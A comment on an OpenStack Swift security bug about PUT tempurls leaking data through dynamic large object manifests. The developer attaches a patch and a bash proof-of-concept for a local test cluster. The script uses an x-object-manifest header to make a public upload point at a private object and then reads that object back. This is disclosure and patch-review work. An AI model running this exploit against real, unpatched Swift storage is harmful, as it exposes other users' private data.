OpenStack Security Advisory

Bug #1453948
Comment #7

Comment 7 for bug 1453948

Revision history for this message

clayg (clay-gerrard) wrote on 2015-06-23: Re: all PUT tempurls leak existence via DLO manifest attack

400 PUT tempurls that have a x-object-manifest header Edit (7.2 KiB, text/plain)

sorry, been busy - attached patch for review

Here's some bash that works on a swift-all-in-one to get you started:

    #!/bin/bash
    # resetswift
    set -e
    echo "password" > secret
    swift upload private secret
    swift post -H 'x-account-meta-temp-url-key: mykey'
    # create a container for people to upload stuff too
    swift post public
    # attacker: "yes hello, can I have a safe place to upload some of my data?"
    PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_test/public/your-thing mykey)"
    curl -XPUT -H 'x-object-manifest: private/secret' "http://localhost:8080${PUT_TEMPURL_SIG}" -d ''
    # attacker: "oh yes, that data I just uploaded - can I download it please?"
    PUT_TEMPURL_SIG="$(swift tempurl GET 60 /v1/AUTH_test/public/your-thing mykey)"
    # attacker: only... it's not *MY* data - trolrolrololollolo
    echo ""
    echo "**************************************"
    curl "http://localhost:8080${PUT_TEMPURL_SIG}"
    echo ""
    echo "**************************************"